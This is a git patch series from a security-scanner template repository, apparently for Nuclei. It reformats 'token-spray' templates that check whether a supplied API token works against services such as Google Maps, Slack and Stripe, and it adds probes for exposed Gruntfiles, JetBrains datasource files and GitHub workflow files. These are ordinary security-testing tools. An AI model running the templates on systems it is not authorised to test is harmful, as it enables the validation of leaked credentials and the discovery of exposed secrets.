"https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml index 483224144e..97aaf95d6c 100644 --- a/token-spray/google-directions.yaml +++ b/token-spray/google-directions.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,directions +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml index a9b2e001c7..31b68e98de 100644 --- a/token-spray/google-elevation.yaml +++ b/token-spray/google-elevation.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,elevation +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml index ebb916fbe5..8ca7a1653f 100644 --- a/token-spray/google-fcm.yaml +++ b/token-spray/google-fcm.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,fcm,firebase,cloud,messaging +self-contained: true requests: - method: POST path: @@ -15,7 +16,6 @@ requests: Authorization: key={{token}} Content-Type: application/json - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml index 0a4a93b767..1fe4c209e8 100644 --- a/token-spray/google-findplacefromtext.yaml +++ b/token-spray/google-findplacefromtext.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,find,text +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml index 5eaf5abb5d..42987ebfe1 100644 --- a/token-spray/google-gedistancematrix.yaml +++ b/token-spray/google-gedistancematrix.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,distance,matrix +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml index 21d1ea1781..dbba7431d5 100644 --- a/token-spray/google-geocode.yaml +++ b/token-spray/google-geocode.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,geocode +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml index 07684fe0e1..a322b89967 100644 --- a/token-spray/google-geolocation.yaml +++ b/token-spray/google-geolocation.yaml @@ -6,20 +6,21 @@ info: severity: info tags: token-spray,google,geolocation +self-contained: true requests: - method: GET path: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - matchers-condition: and - self-contained: true + matchers-condition: and matchers: - type: word part: body + negative: true words: - 'error' - negative: true + - type: status + negative: true status: - 404 - negative: true diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml index d7d9c5e05f..f8689ae282 100644 --- a/token-spray/google-mapsembed.yaml +++ b/token-spray/google-mapsembed.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,maps,embed +self-contained: true requests: - method: GET path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml index 8fd69d623d..171ff4b005 100644 --- a/token-spray/google-mapsembedadvanced.yaml +++ b/token-spray/google-mapsembedadvanced.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,maps,embed +self-contained: true requests: - method: GET path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml index d40f6d479c..db0dda7fab 100644 --- a/token-spray/google-nearbysearch.yaml +++ b/token-spray/google-nearbysearch.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,search,nearby +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml index ab8ebf2b98..9551876122 100644 --- a/token-spray/google-nearestroads.yaml +++ b/token-spray/google-nearestroads.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,roads +self-contained: true requests: - method: GET path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 3a9935ba6a..2f6cf7d464 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,place,details +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml index 88790a68ec..6b6b3cd539 100644 --- a/token-spray/google-placesphoto.yaml +++ b/token-spray/google-placesphoto.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,places,photo +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml index e034096bfc..6dce339499 100644 --- a/token-spray/google-playablelocations.yaml +++ b/token-spray/google-playablelocations.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,playable,locations +self-contained: true requests: - method: GET path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml index 4efb960afd..2c0853eda0 100644 --- a/token-spray/google-routetotraveled.yaml +++ b/token-spray/google-routetotraveled.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,route +self-contained: true requests: - method: GET path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml index dd06969472..e5e8290a6a 100644 --- a/token-spray/google-speedlimit.yaml +++ b/token-spray/google-speedlimit.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,speed,limit +self-contained: true requests: - method: GET path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml index 5011053baf..ba4ee679ca 100644 --- a/token-spray/google-staticmaps.yaml +++ b/token-spray/google-staticmaps.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,maps +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml index cc0344919f..d7156a7295 100644 --- a/token-spray/google-streetview.yaml +++ b/token-spray/google-streetview.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,streetview +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml index 33f8002db5..40b13b61ca 100644 --- a/token-spray/google-timezone.yaml +++ b/token-spray/google-timezone.yaml @@ -6,12 +6,12 @@ info: severity: info tags: token-spray,google,timezone +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml index 29e5fcca5a..290da60328 100644 --- a/token-spray/googlet-extsearchplaces.yaml +++ b/token-spray/googlet-extsearchplaces.yaml @@ -6,15 +6,15 @@ info: severity: info tags: token-spray,google,search,places,text +self-contained: true requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" - self-contained: true matchers: - type: word part: body + negative: true words: - 'error_message' - negative: true diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml index ec76722f11..ef81ec91e8 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/heroku.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,heroku +self-contained: true requests: - method: POST path: @@ -15,12 +16,11 @@ requests: Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} - self-contained: true matchers: - type: status + condition: or status: - 200 - 201 - 202 - 206 - condition: or diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml index b1a796d113..da95a4b12a 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/hubspot.yaml @@ -7,13 +7,13 @@ info: severity: info tags: token-spray,hubspot +self-contained: true requests: - method: GET path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml index 8ab1b9131d..dd851bee3e 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/instagram.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,instagram,graph +self-contained: true requests: - method: GET path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml index 4c912bf0b7..ac527d2a1e 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/ipstack.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,ipstack +self-contained: true requests: - method: GET path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index a4d77e7575..69da55de5d 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,iterable +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Api_Key: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml index cdfbdba931..dbf3c9ab35 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/jumpcloud.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,jumpcloud +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-Api-Key: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml index 5ca1351c6d..5003f25b31 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/lokalise.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,lokalise +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-Api-Token: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml index 2cbb1f4e69..dcbf5b156d 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/loqate.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,loqate +self-contained: true requests: - method: GET path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml index 840ab656f4..d25870e279 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/mailchimp.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mailchimp +self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" @@ -14,7 +15,6 @@ network: host: - "tls://smtp.mandrillapp.com:465" - self-contained: true matchers: - type: word words: diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml index 67d7c356bd..c4997aaaa4 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/mailgun.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mailgun +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml index 5e68a1ec4b..1e246f783b 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/mapbox.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,mapbox +self-contained: true requests: - method: GET path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml index a0b6cddb77..ca570964e4 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/nerdgraph.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,newrelic,nerdgraph +self-contained: true requests: - method: POST path: @@ -16,7 +17,6 @@ requests: API-Key: "{{token}}" body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml index 6105c678db..fb0ef0b6b7 100644 --- a/token-spray/npm.yaml +++ b/token-spray/npm.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,node,npm,package,manager +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml index 4c32828a44..916936aa97 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/openweather.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,weather,openweather +self-contained: true requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml index 48756e267e..bad59948ed 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/pagerduty.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pagerduty +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml index 5a46a542a8..66cd885dc6 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/pendo.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pendo +self-contained: true requests: - method: GET path: @@ -16,7 +17,6 @@ requests: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml index 29e6e32c56..d7a74ded66 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/pivotaltracker.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pivotaltracker +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: X-TrackerToken: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml index 72480a7efc..85367b5c61 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/postmark.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,postmark +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Accept: application/json X-Postmark-Server-Token: "{{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml index b84a41a488..d9330371f1 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/sendgrid.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,sendgrid +self-contained: true network: - inputs: - data: "ehlo\r\n" @@ -16,7 +17,6 @@ network: host: - "tls://smtp.sendgrid.net:465" - self-contained: true matchers: - type: word words: diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml index e9e2a0af1e..8203aa56b5 100644 --- a/token-spray/slack.yaml +++ b/token-spray/slack.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,slack +self-contained: true requests: - method: POST path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml index 9ca1db987c..aed9d1760f 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/sonarcloud.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,sonarcloud +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml index 7cb306b924..01f1d80084 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/spotify.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,spotify +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/square.yaml b/token-spray/square.yaml index 2a5f7210fb..7ccb835189 100644 --- a/token-spray/square.yaml +++ b/token-spray/square.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,square +self-contained: true requests: - method: GET path: @@ -16,7 +17,6 @@ requests: Content-Type: application/json Authorization: Bearer {{token}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml index 15dd931744..50e8979aa7 100644 --- a/token-spray/stripe.yaml +++ b/token-spray/stripe.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64(token + ':')}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml index 44598c428a..357fb1bdbf 100644 --- a/token-spray/tinypng.yaml +++ b/token-spray/tinypng.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,tinypng +self-contained: true requests: - method: POST path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Basic {{base64('api:' + token)}} - self-contained: true matchers: - type: word part: header diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml index c17c49290f..3b43f9e529 100644 --- a/token-spray/travisci.yaml +++ b/token-spray/travisci.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,travis +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Travis-API-Version: 3 Authorization: token {{token}} - self-contained: true matchers: - type: status status: diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml index 9657045185..ec654b2782 100644 --- a/token-spray/twitter.yaml +++ b/token-spray/twitter.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,twitter +self-contained: true requests: - method: GET path: @@ -14,7 +15,6 @@ requests: headers: Authorization: Bearer {{token}} - self-contained: true matchers: - type: word part: body diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml index d7d6c6b836..e7c0a0a2f8 100644 --- a/token-spray/visualstudio.yaml +++ b/token-spray/visualstudio.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,visualstudio,microsoft +self-contained: true requests: - method: GET path: @@ -15,7 +16,6 @@ requests: Content-Type: application/json X-Api-Token: "{{token}}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml index c54d184fc1..7237446fce 100644 --- a/token-spray/wakatime.yaml +++ b/token-spray/wakatime.yaml @@ -7,12 +7,12 @@ info: severity: info tags: token-spray,wakatime +self-contained: true requests: - method: GET path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - self-contained: true matchers: - type: status status: diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml index 79ddab793f..37e6b647ef 100644 --- a/token-spray/weglot.yaml +++ b/token-spray/weglot.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,weglot +self-contained: true requests: - method: POST path: @@ -15,7 +16,6 @@ requests: Content-Type: application/json body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" - self-contained: true matchers: - type: word part: body diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml index 1546808ea7..8c1384579b 100644 --- a/token-spray/youtube.yaml +++ b/token-spray/youtube.yaml @@ -7,18 +7,19 @@ info: severity: info tags: token-spray,youtube +self-contained: true requests: - method: GET path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - matchers-condition: or - self-contained: true + matchers-condition: or matchers: - type: word part: body words: - 'quotaExceeded' + - type: status status: - 200 From 0d59819a8a97c398b04ec4cc148f141fedbc4db2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 20 Oct 2021 14:17:32 +0530 Subject: [PATCH 13/39] misc update --- token-spray/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/README.md b/token-spray/README.md index e49667d4b7..4c463e5694 100644 --- a/token-spray/README.md +++ b/token-spray/README.md @@ -4,7 +4,7 @@ This directory holds templates that have static API URL endpoints. Use these to ## Usage -**token-spray** are self-contained template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. +token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. ```console # Running token-spray templates against a single token to test From 9ded2fcccf0c311f45d45b55ccc25bbf0dc6390e Mon Sep 17 00:00:00 2001 From: Sufijen Bani Date: Wed, 20 Oct 2021 18:28:48 +0200 Subject: [PATCH 14/39] Add Gruntfile Expose Test Gruntfile can include secrets or other information that helps find further vulnerabilities. --- exposures/configs/gruntfile.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/configs/gruntfile.yaml diff --git a/exposures/configs/gruntfile.yaml b/exposures/configs/gruntfile.yaml new file mode 100644 index 0000000000..bac81870cb --- /dev/null +++ b/exposures/configs/gruntfile.yaml @@ -0,0 +1,27 @@ +id: gruntfile + +info: + name: gruntfile exposure + author: sbani + severity: info + reference: https://gruntjs.com/sample-gruntfile + tags: config,exposure + +requests: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/Gruntfile.js" + - "{{BaseURL}}/Gruntfile.coffee" + + matchers-condition: and + matchers: + - type: word + words: + - "module.exports" + part: body + + - type: status + status: + - 200 From ecdb28d8265683765e71050a53c7812077cbfe28 Mon Sep 17 00:00:00 2001 From: Florian Maak Date: Wed, 20 Oct 2021 19:07:25 +0200 Subject: [PATCH 15/39] Add jetbrains datasource exposure check --- exposures/configs/jetbrains-datasources.yaml | 24 ++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/configs/jetbrains-datasources.yaml diff --git a/exposures/configs/jetbrains-datasources.yaml b/exposures/configs/jetbrains-datasources.yaml new file mode 100644 index 0000000000..b09b7da590 --- /dev/null +++ b/exposures/configs/jetbrains-datasources.yaml @@ -0,0 +1,24 @@ +id: package-json + +info: + name: Jetbrains IDE DataSources exposure + author: FlorianMaak + severity: info + description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure. + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.idea/dataSources.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "uuid" + part: body + + - type: status + status: + - 200 From ccc026ac704daa6dd44a19ca68cc7075033ed85d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 20 Oct 2021 13:44:17 -0500 Subject: [PATCH 16/39] Update github-workflows-disclosure.yaml Might expose a SNYK_TOKEN --- exposures/configs/github-workflows-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/github-workflows-disclosure.yaml b/exposures/configs/github-workflows-disclosure.yaml index af981920a3..e7d9ea7f28 100644 --- a/exposures/configs/github-workflows-disclosure.yaml +++ b/exposures/configs/github-workflows-disclosure.yaml @@ -36,6 +36,7 @@ requests: - "{{BaseURL}}/.github/workflows/ci-daily.yml" - "{{BaseURL}}/.github/workflows/ci-issues.yml" - "{{BaseURL}}/.github/workflows/smoosh-status.yml" + - "{{BaseURL}}/.github/workflows/snyk.yml" matchers-condition: and matchers: From 5178c7e17d464074b15e0b24775030f2aaf870f1 Mon Sep 17 00:00:00 2001 From: Daniel Saxton Date: Wed, 20 Oct 2021 16:04:42 -0500 Subject: [PATCH 17/39] Fix case in S3 bucket detection template --- technologies/aws/aws-bucket-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/aws/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml index ad824b8670..f2d61d54f4 100644 --- a/technologies/aws/aws-bucket-service.yaml +++ b/technologies/aws/aws-bucket-service.yaml @@ -18,7 +18,7 @@ requests: - contains(tolower(all_headers), 'x-amz-bucket') - contains(tolower(all_headers), 'x-amz-request') - contains(tolower(all_headers), 'x-amz-id') - - contains(tolower(all_headers), 'AmazonS3') + - contains(tolower(all_headers), 'amazons3') part: header condition: or From 9cc075011a03ad95cb0d137523c86adff7fc6f2a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 20 Oct 2021 16:16:15 -0500 Subject: [PATCH 18/39] Create detect-jabber-xmpp.yaml --- network/detect-jabber-xmpp.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 network/detect-jabber-xmpp.yaml diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml new file mode 100644 index 0000000000..7dbfdd8e64 --- /dev/null +++ b/network/detect-jabber-xmpp.yaml @@ -0,0 +1,24 @@ +id: detect-jabber-xmpp + +info: + name: Detects Jabber XMPP Instance + author: geeknik + severity: info + description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence. + reference: https://datatracker.ietf.org/doc/html/rfc6120 + tags: network,jabber,xmpp + +network: + - inputs: + - data: "a\n" + + host: + - "{{Hostname}}" + - "{{Hostname}}:5222" + + matchers: + - type: word + words: + - "stream:stream xmlns:stream" + - "stream:error xmlns:stream" + condition: or From f05e7364ca06e77a080464696f1b4a4e055eba03 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Oct 2021 22:40:20 +0000 Subject: [PATCH 19/39] Auto Generated CVE annotations [Wed Oct 20 22:40:20 UTC 2021] :robot: --- cves/2021/CVE-2021-20031.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20031.yaml b/cves/2021/CVE-2021-20031.yaml index 97ff54f001..2dc86669e2 100644 --- a/cves/2021/CVE-2021-20031.yaml +++ b/cves/2021/CVE-2021-20031.yaml @@ -3,7 +3,7 @@ id: CVE-2021-20031 info: name: Sonicwall SonicOS 7.0 - Host Header Injection author: gy741 - severity: low + severity: medium description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack reference: - 